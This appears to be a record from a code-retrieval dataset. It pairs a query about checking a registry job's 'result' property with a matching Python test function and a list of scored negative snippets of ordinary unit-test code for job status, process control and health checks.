post_json, headers={\"x-session-id\": self.session_id})\n\n self.assertEqual(response.status_code, 200, msg=str(response.json))\n self.assertEqual(response.headers.get(\"Content-Type\"), \"application/json\")\n json = response.json\n # response ids are coming back as string, so patch the jobIdDict\n job_id_dict = {k: str(self.jobIdDict[k]) for k in self.jobIdDict.keys()}\n job_list = json[\"jobs\"]\n approp_job = None\n cross_job = None\n for job in job_list:\n if str(job[\"job_id\"]) == str(job_id_dict[\"appropriations\"]):\n # Found the job to be checked\n approp_job = job\n elif str(job[\"job_id\"]) == str(job_id_dict[\"cross_file\"]):\n # Found cross file job\n cross_job = job\n\n # Must have an approp job and cross-file job\n self.assertNotEqual(approp_job, None)\n self.assertNotEqual(cross_job, None)\n # And that job must have the following\n self.assertEqual(approp_job[\"job_status\"], \"ready\")\n 
self.assertEqual(approp_job[\"job_type\"], \"csv_record_validation\")\n self.assertEqual(approp_job[\"file_type\"], \"appropriations\")\n self.assertEqual(approp_job[\"filename\"], \"approp.csv\")\n self.assertEqual(approp_job[\"file_status\"], \"complete\")\n self.assertIn(\"missing_header_one\", approp_job[\"missing_headers\"])\n self.assertIn(\"missing_header_two\", approp_job[\"missing_headers\"])\n self.assertIn(\"duplicated_header_one\", approp_job[\"duplicated_headers\"])\n self.assertIn(\"duplicated_header_two\", approp_job[\"duplicated_headers\"])\n # Check file size and number of rows\n self.assertEqual(approp_job[\"file_size\"], 2345)\n self.assertEqual(approp_job[\"number_of_rows\"], 567)\n\n # Check error metadata for specified error\n rule_error_data = None\n for data in approp_job[\"error_data\"]:\n if data[\"field_name\"] == \"header_three\":\n rule_error_data = data\n self.assertIsNotNone(rule_error_data)\n self.assertEqual(rule_error_data[\"field_name\"], \"header_three\")\n self.assertEqual(rule_error_data[\"error_name\"], \"rule_failed\")\n self.assertEqual(rule_error_data[\"error_description\"], \"A rule failed for this value.\")\n self.assertEqual(rule_error_data[\"occurrences\"], \"7\")\n self.assertEqual(rule_error_data[\"rule_failed\"], \"Header three value must be real\")\n self.assertEqual(rule_error_data[\"original_label\"], \"A1\")\n # Check warning metadata for specified warning\n warning_error_data = None\n for data in approp_job[\"warning_data\"]:\n if data[\"field_name\"] == \"header_three\":\n warning_error_data = data\n self.assertIsNotNone(warning_error_data)\n self.assertEqual(warning_error_data[\"field_name\"], \"header_three\")\n self.assertEqual(warning_error_data[\"error_name\"], \"rule_failed\")\n self.assertEqual(warning_error_data[\"error_description\"], \"A rule failed for this value.\")\n self.assertEqual(warning_error_data[\"occurrences\"], \"7\")\n self.assertEqual(warning_error_data[\"rule_failed\"], \"Header three value looks odd\")\n self.assertEqual(warning_error_data[\"original_label\"], \"A2\")\n\n rule_error_data = None\n for data in cross_job[\"error_data\"]:\n if data[\"field_name\"] == \"header_four\":\n rule_error_data = data\n\n self.assertEqual(rule_error_data[\"source_file\"], \"appropriations\")\n self.assertEqual(rule_error_data[\"target_file\"], \"award\")\n\n # Check submission metadata\n self.assertEqual(json[\"cgac_code\"], \"SYS\")\n self.assertEqual(json[\"reporting_period_start_date\"], \"Q1/2016\")\n self.assertEqual(json[\"reporting_period_end_date\"], \"Q1/2016\")\n\n # Check submission level info\n self.assertEqual(json[\"number_of_errors\"], 17)\n self.assertEqual(json[\"number_of_rows\"], 667)\n\n # Get submission from db for attribute checks\n submission = sess.query(Submission).filter(\n Submission.submission_id == self.status_check_submission_id).one()\n\n # Check number of errors and warnings in submission table\n self.assertEqual(submission.number_of_errors, 17)\n self.assertEqual(submission.number_of_warnings, 7)\n\n # Check that submission was created today, this test may fail if run right at midnight UTC\n self.assertEqual(json[\"created_on\"], datetime.utcnow().strftime(\"%m/%d/%Y\"))\n self.assertEqual(json[\"last_updated\"], submission.updated_at.strftime(\"%Y-%m-%dT%H:%M:%S\"))", "def test_get_refresh_job_status(self):\n pass", "def test_dispatch_status(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n\n 
self.assertEqual(broker.get_messages('vumi', 'fooconn.status'), [])\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield worker_helper.dispatch_status(msg, 'fooconn')\n\n self.assertEqual(\n broker.get_messages('vumi', 'fooconn.status'), [msg])", "def test_status(self):\n resource = self.eventSourceResource()\n response = self.render(resource)\n\n self.assertEquals(response.code, 200)", "def test_wait_for_dispatched_statuses_no_connector(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper(status_connector_name='fooconn')\n d = worker_helper.wait_for_dispatched_statuses(1)\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield self._add_to_dispatched(\n worker_helper.broker, 'fooconn.status', msg, kick=True)\n dispatched = success_result_of(d)\n self.assertEqual(dispatched, [msg])", "def test_response_ok():\n\t\n\t# Send GET request to API given endpoint and store the response.\n\tresponse = get_items()\n\n\t# Confirm that the request-response cycle completed successfully.\n\t#assert_true(response.ok)\n\tif ('None' in response): print(\"Failed calling REST API: {}\".format(response))\n\telse: print(\"TC Passed, Response OK: {}\".format(response))", "def test_get_jobs_status(\n globals, urls, client, mock_test_responses, context_fixture):\n\n context = context_fixture('Healthy')\n mock_test_responses(task='upload', status=CoreStatus.DONE)\n responses.add(\n responses.GET, urls('task', 'upload'),\n json={\n '_id': globals['upload'],\n 'status': CoreStatus.FAIL\n },\n status=200,\n content_type='application/json')\n\n for i in range(2):\n client.upload(file=globals['test_csv_file'], name=str(i))\n\n context.run()\n job_fail = context.get_jobs_status(status=['fail'])\n\n assert job_fail.iloc[0]['status'] == 'fail'\n assert job_fail.iloc[0]['Job'] == '1'", "def test_pt_present(\n self, ensure_present_func, ensure_absent_func, check_mode):\n\n # Prepare input arguments\n params = {\n 'state': 'present',\n 'log_file': None,\n }\n\n # Prepare return values\n changed = False\n result = {\n 'fake-prop': 'fake-value',\n }\n\n # Prepare mocks\n ensure_present_func.return_value = (changed, result)\n\n # Exercise code\n actual_changed, actual_result = zhmc_nic.perform_task(\n params, check_mode)\n\n # Assert return values\n assert actual_changed == changed\n assert actual_result == result\n\n # Assert call to the desired action function\n assert ensure_present_func.call_args == mock.call(params, check_mode)\n\n # Assert no call to the other action functions\n assert ensure_absent_func.called is False", "def test__get_runnable_success(self):\n\n resource = Mock()\n resource._get_runnable = BaseResource._get_runnable.__get__(resource, BaseResource)\n\n resource._get_runnable('a_runnable')\n resource.api.get_runnable.assert_called_once_with('a_runnable')\n resource.api.get_runnable.return_value.assert_called_once_with(resource.request)", "def test_get_task_success(self):\n task_id = util.MOCK_UUID_1\n\n rv = TEST_CLIENT.get(f\"/tasks/{task_id}\")\n result = rv.json()\n\n expected = util.MOCK_TASK_1\n self.assertEqual(result, expected)\n self.assertEqual(rv.status_code, 200)", "def jobHealthy(self, count):\n job = self.tester.submission_result.job\n for idx in range(count - 1):\n if (job.health == 'healthy'):\n return True\n print(\"health check fail : %d\" % idx )\n time.sleep(1)\n job.refresh()\n self.assertEqual('healthy', job.health)\n return False", "def 
test_execute_check_http(delay):\n port = port_for.select_random()\n good_path = '/good_path'\n\n check = check_http('http://127.0.0.1:%s%s' % (port, good_path))\n check_bad_path = check_http('http://127.0.0.1:%s/bad_path' % port) # This request will not return 200.\n\n assert check() is False\n assert check_bad_path() is False\n\n process = execute(\n [SERVICE, '--delay', str(delay), 'http', '--port', str(port), '--path', good_path],\n [check],\n timeout=1 + delay)\n assert check() is True\n assert check_bad_path() is False\n\n assert process.poll() is None\n process.kill()", "def getStatus(self, test_mngr_initr):\n self.test_mngr_initr = test_mngr_initr\n self.processTask()\n\n return self.__status", "def test_all_process_info(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': Mock(**{'serial.return_value': {'name': 'proc_1'}}),\n 'proc_2': Mock(**{'serial.return_value': {'name': 'proc_2'}})}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'proc_1'}, {'name': 'proc_2'}],\n rpc.get_all_process_info())\n self.assertEqual([call()], mocked_check.call_args_list)", "def test_site_checker():\n\n regexps = [Regexp(id=0, regexp=\"200 OK\"),\n Regexp(id=1, regexp=\".*OK$\"),\n Regexp(id=2, regexp=\"^200\"),\n Regexp(id=3, regexp=\"^Failure\")]\n site = Site(id=SITE_ID,\n url=\"http://httpstat.us/200\",\n regexps=regexps)\n checker = SiteChecker(site, 60)\n completed = threading.Event()\n\n test = {SITE_ID: None}\n\n def on_check_complete_cb(site_id, status_code, response_time, failed_regexps):\n \"\"\" Callback function provided to SiteChecker \"\"\"\n test[site_id] = {'status_code': status_code,\n 'response_time_ms': response_time,\n 'failed_regexps': failed_regexps}\n completed.set()\n\n checker.start(on_check_complete_cb)\n\n while not completed.isSet():\n completed.wait(3)\n break\n\n checker.stop()\n\n assert len(test) == 1\n assert test[SITE_ID] is not None\n assert test[SITE_ID]['status_code'] == 200\n assert test[SITE_ID]['response_time_ms'] is not None\n assert test[SITE_ID]['response_time_ms'] > 0\n print(\"Failed: {}\".format(test[SITE_ID]['failed_regexps']))\n assert test[SITE_ID]['failed_regexps'] == [3]", "def test_ifServicesAreRunning():\n for name in config.toTest:\n testConfig = dynamicallyLoadModule(name)\n if \"service\" in testConfig.config:\n print \"Service: \"+ testConfig.config[\"name\"]\n if sys.platform.startswith(\"darwin\"):\n yield assertionFunctions.checkIfServiceIsRunning_OSX, testConfig.config\n elif sys.platform.startswith(\"linux\"):\n yield assertionFunctions.checkIfServiceIsRunning_Linux, testConfig.config\n else:\n assert False, str(sys.platform)+\": Not supported!\"", "async def test_at_start_when_running_awaitable(hass):\n assert hass.state == core.CoreState.running\n assert hass.is_running\n\n calls = []\n\n async def cb_at_start(hass):\n \"\"\"Home Assistant is started.\"\"\"\n calls.append(1)\n\n start.async_at_start(hass, cb_at_start)\n await hass.async_block_till_done()\n assert len(calls) == 1\n\n hass.state = core.CoreState.starting\n assert hass.is_running\n\n start.async_at_start(hass, cb_at_start)\n await hass.async_block_till_done()\n assert len(calls) == 2", "def test_success_result(self):\n dr = EventualResult(succeed(123), None)\n self.assertEqual(dr.wait(0.1), 123)", "def test_get_status(self):\n resp = self.build_api.getStatus().json()\n assert 'status' in resp\n assert 'message' 
in resp", "def test_successful(self):\n\n url = '/%s/job-types/status/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 4)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job1.job_type.name)\n self.assertEqual(result['results'][0]['job_counts'][0]['count'], 1)", "def check_status(status):\n if status == 'success':\n return True\n return False", "def cb_test( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n self.post_to_queue( \"call\", self.helper_thread.test_test_ports , ( ) )", "def testSuccess(self):\n seq_num = 9\n request = struct.pack(HEADER_FMT, REQUEST_TYPE, seq_num)\n reply = self.sendAndReceive(request)\n reply_type, replied_seq_num = struct.unpack(HEADER_FMT,\n reply[0:HEADER_SIZE])\n self.assertEqual(REPLY_TYPE, reply_type)\n self.assertEqual(seq_num, replied_seq_num)\n metrics = json.loads(reply[HEADER_SIZE:])\n self.assertEqual([], metrics['Components'])", "def test_calls_success_callback(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n call_count = []\n\n def do_things():\n call_count.append(1)\n\n work = Async(target=dir, args=[1],\n callbacks={'success': do_things})\n\n with _ExecutionContext(work):\n run_job()\n\n self.assertEqual(1, len(call_count))", "def check_summary_status(cls, task_id, req, app):\n with app.app_context():\n from app import db\n try:\n status_url = cls.dvs_api_v1 + '/bulkstatus/' + task_id\n response = requests.post(url=status_url)\n state = response.json().get('state')\n while state == 'PENDING':\n time.sleep(60)\n response = requests.post(url=status_url)\n state = response.json().get('state')\n app.logger.info('task_id:{0}-request_id:{1}-status:{2}'.\n format(task_id, req.id, state))\n time.sleep(20)\n response = requests.post(url=status_url)\n result = response.json().get('result')\n req.summary = json.dumps({'summary': result})\n req.report = result.get('compliant_report_name')\n req.update_report_status('Processed')\n req.save()\n db.session.commit()\n app.logger.info('task_id:{0}-request_id:{1}-status:COMPLETED'.\n format(task_id, req.id, state))\n cls.copy_report(req)\n except Exception as e:\n app.logger.exception({\"error\": e, 'task_id': task_id, 'response': response.json() or None})\n db.session.rollback()\n req.update_report_status('Failed')\n db.session.commit()", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "def _assert_single_subtask_status(self, entry, succeeded, failed=0, skipped=0, retried_nomax=0, retried_withmax=0):\r\n subtask_info = json.loads(entry.subtasks)\r\n # verify subtask-level counts:\r\n self.assertEquals(subtask_info.get('total'), 1)\r\n self.assertEquals(subtask_info.get('succeeded'), 1 if succeeded > 0 else 0)\r\n self.assertEquals(subtask_info.get('failed'), 0 if succeeded > 0 else 1)\r\n # verify individual subtask status:\r\n subtask_status_info = subtask_info.get('status')\r\n task_id_list = subtask_status_info.keys()\r\n self.assertEquals(len(task_id_list), 1)\r\n task_id = task_id_list[0]\r\n subtask_status = subtask_status_info.get(task_id)\r\n print(\"Testing subtask status: {}\".format(subtask_status))\r\n self.assertEquals(subtask_status.get('task_id'), task_id)\r\n self.assertEquals(subtask_status.get('attempted'), succeeded + failed)\r\n 
self.assertEquals(subtask_status.get('succeeded'), succeeded)\r\n self.assertEquals(subtask_status.get('skipped'), skipped)\r\n self.assertEquals(subtask_status.get('failed'), failed)\r\n self.assertEquals(subtask_status.get('retried_nomax'), retried_nomax)\r\n self.assertEquals(subtask_status.get('retried_withmax'), retried_withmax)\r\n self.assertEquals(subtask_status.get('state'), SUCCESS if succeeded > 0 else FAILURE)", "def check_indicator_files(tasks):\n\n for task in tasks:\n if task[\"status\"]==\"unknown\":\n if os.path.exists(task[\"result\"]):\n task[\"status\"]=\"previously completed\"\n else:\n task[\"status\"]=\"to do\"\n return" ]
[ "0.6107858", "0.6048469", "0.6048469", "0.60329425", "0.5998805", "0.59744084", "0.59617215", "0.59564376", "0.5914125", "0.5885923", "0.5870812", "0.58333784", "0.58272076", "0.5810825", "0.5786063", "0.57617617", "0.57480896", "0.5696804", "0.5684844", "0.5677295", "0.56715876", "0.56701237", "0.56689763", "0.56664574", "0.5665494", "0.5630704", "0.56075156", "0.5601005", "0.5594014", "0.5585465", "0.5581442", "0.5579213", "0.55323386", "0.55314213", "0.5526712", "0.5524931", "0.551977", "0.5508211", "0.54988164", "0.5479387", "0.54743737", "0.5465123", "0.5463767", "0.54633766", "0.54606503", "0.54563564", "0.54536116", "0.54520935", "0.54503256", "0.54454976", "0.5440115", "0.543384", "0.5430491", "0.542603", "0.54151464", "0.5408163", "0.5406186", "0.5399829", "0.539579", "0.5395137", "0.53902066", "0.5381927", "0.53794307", "0.53751993", "0.5359435", "0.5355414", "0.5355136", "0.5350556", "0.534995", "0.53450185", "0.53138757", "0.53129554", "0.53126025", "0.53071576", "0.5306887", "0.5305626", "0.5301092", "0.53008324", "0.52997166", "0.5287077", "0.52867854", "0.5286601", "0.52857065", "0.5285519", "0.52827716", "0.5282406", "0.5282381", "0.5277721", "0.5275234", "0.5274899", "0.5268453", "0.5267966", "0.52650005", "0.52627873", "0.5260903", "0.5257482", "0.52566683", "0.525523", "0.52406687", "0.5239075" ]
0.81807953
0
Test if there is a 'result' property containing the result of the registry process. Test uses start_call_fx fixture
def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') job_id = response.data.get('job_id') job = client.get(job_id) result = job.json() assert result.get('result') registry_url = json.loads(result.get('result')) assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_start_process(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_process\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # patch the instance\n rpc._get_application_process = Mock()\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_process('strategy', 'appli:proc')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running process\n rpc._get_application_process.return_value = (\n None, Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc1'}))\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running processes\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n Mock(**{'running.return_value': False}),\n Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc2'})]}), None)\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc2', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped processes\n proc_1 = Mock(**{'running.return_value': False,\n 'stopped.return_value': True,\n 'namespec.return_value': 'proc1'})\n proc_2 = Mock(**{'running.return_value': False,\n 'stopped.return_value': False,\n 'namespec.return_value': 'proc2'})\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n proc_1, proc_2]}), None)\n # test RPC call with no wait and not done\n mocked_start.return_value = False\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call no wait and done\n mocked_start.return_value = True\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n 
self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and done\n result = rpc.start_process(2, 'appli:*', wait=True)\n self.assertTrue(result)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_process(2, 'appli:*', wait=True)\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and process still stopped\n mocked_progress.return_value = False\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and process running\n proc_1.stopped.return_value = False\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def test_starts_returned_context(self):\n from furious.context.context import Context\n from furious.processors import _handle_results\n\n processor = Mock()\n processor.return_value = Mock(spec=Context)\n\n _handle_results({'_process_results': processor})\n\n processor.return_value.start.assert_called_once_with()", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_is_running(self, mock_call):\n\t\tmock_call.return_value = False \n\t\tdevice = Device(1, \"testDevice\", \"testDesc\", \"pump\", 1)\n\t\tdm = DeviceManager()\n\t\tresponse = dm.isRunning(device) \n\t\tself.assertEqual(response, False)", "def test_all_process_info(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.processes = {\n 'proc_1': Mock(**{'serial.return_value': {'name': 'proc_1'}}),\n 'proc_2': Mock(**{'serial.return_value': {'name': 'proc_2'}})}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'proc_1'}, {'name': 'proc_2'}],\n rpc.get_all_process_info())\n self.assertEqual([call()], mocked_check.call_args_list)", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n 
from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_check_process_output(self):\n workflow = self.get_workflow(\n \"\"\"file://result <- file://source\n echo test\n \"\"\")\n workflow.pre_check_processes()\n try:\n process = workflow._processes[0]\n create_tuttle_dirs()\n workflow.run_process(process)\n assert False, \"Exception has not been not raised\"\n except ResourceError:\n assert True", "def test_start_args(self, mocked_check, mocked_proc):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n info_source = self.supervisor.supvisors.info_source\n info_source.update_extra_args.side_effect = KeyError\n info_source.supervisor_rpc_interface.startProcess.side_effect = [\n RPCError(Faults.NO_FILE, 'no file'),\n RPCError(Faults.NOT_EXECUTABLE),\n RPCError(Faults.ABNORMAL_TERMINATION),\n 'done']\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with extra 
arguments and a process that is not compliant\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_EXTRA_ARGUMENTS, exc.exception.code)\n self.assertEqual(\"BAD_EXTRA_ARGUMENTS: rules for namespec appli:proc\"\n \" are not compatible with extra arguments in command line\",\n exc.exception.text)\n self.assertEqual(0, mocked_check.call_count)\n self.assertEqual(0, info_source.update_extra_args.call_count)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n # test RPC call with extra arguments and a process that is compliant\n # but unknown in Supervisor\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual(\"BAD_NAME: namespec appli:proc unknown in this Supervisor instance\",\n exc.exception.text)\n self.assertEqual([call('appli:proc', 'dummy arguments')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n info_source.update_extra_args.reset_mock()\n info_source.update_extra_args.side_effect = None\n # test RPC call with start exceptions\n mocked_proc.side_effect = None\n mocked_proc.return_value = None, None\n # NO_FILE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc')\n self.assertEqual(Faults.NO_FILE, exc.exception.code)\n self.assertEqual(\"NO_FILE: no file\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', True)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NO_FILE: no file')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # NOT_EXECUTABLE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.NOT_EXECUTABLE, exc.exception.code)\n self.assertEqual(\"NOT_EXECUTABLE\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NOT_EXECUTABLE')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # other exception doesn't trigger an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual(\"ABNORMAL_TERMINATION\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual(0, info_source.force_process_fatal.call_count)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # finally, normal 
behaviour\n self.assertEqual('done', rpc.start_args('appli:proc'))", "def test_runs_given_function(self):\n from furious.processors import _handle_results\n\n processor = Mock()\n\n _handle_results({'_process_results': processor})\n\n processor.assert_called_once_with()", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_run_started(self):", "def process_test_start(self, config, results, result_id, db):\n pass", "def startTestRun(self):", "def __call__(self, result = None):\r\n if result != None:\r\n self.result = result\r\n else:\r\n self.result = core.FW_conf['connection'].getResult()\r\n assert self.result, 'Internal error: test result is missing from Phone Manager instance!'\r\n\r\n core.FW_conf['connection'].currentTcId = self.tcId\r\n for remote in core.FW_conf['remote_connection']:\r\n remote.setResult(self.result)\r\n remote.currentTcId = self.tcId\r\n\r\n self.result.startTest(self)\r\n\r\n # add comment to test report whether we are in WhiteBox/HW Assisted WhiteBox mode\r\n self.comment('Executing test case in %s mode' % (core.FW_conf['blackbox_enabled'] and 'HW Assisted WhiteBox' or 'WhiteBox'))\r\n\r\n # add test case information for bltue report\r\n self.addBltueTestCase(self.tcId)\r\n\r\n try:\r\n # Code inside the next try-except -block must not raise exceptions.\r\n # All exception handling must be done within the logApply method.\r\n 